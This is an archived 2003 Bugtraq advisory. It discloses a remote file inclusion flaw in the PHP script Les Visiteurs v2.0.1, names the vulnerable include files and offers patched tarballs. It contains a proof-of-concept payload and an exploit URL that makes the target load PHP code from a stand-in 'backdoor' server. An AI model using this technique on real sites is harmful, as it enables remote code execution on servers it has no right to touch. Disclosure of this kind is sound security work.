lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20031026014552.29908.qmail@sf-www3-symnsj.securityfocus.com>
Date: 26 Oct 2003 01:45:52 -0000
From: Matthieu Peschaud <bugtrack@...zwam.net>
To: bugtraq@...urityfocus.com
Subject: Les Visiteurs v2.0.1 code injection vulnerability




Les Visiteurs is a great statistics script written in php.
It gives you some graphicals informations on visitors of
your website.

This script was distributed by phpinfo.net but is no more
maintained since a year.

---------
In this version severals unprotected includes can be found 
in files:

- include/config.inc.php
- include/new-visitor.inc.php

It is possible to include a php file from a backdoor server, 
and execute it on the target's server.
You just have to create on the backdoor srv these files:
- lang/<lang>.inc.php
- db/db_mysql.inc.php

fill one with something like:
<?
echo '<?
echo "<br><br>included from backdoor server :p<br>";
?>';
?>

and call an url as:
http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/
---------


Because the script is not maintained and will not be patched,
i make some tarballs with a patched version.

You will find it at this url:
http://chezwam.net/main/publications/lesvisiteurs/

Matthieu Peschaud
Epita - France


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ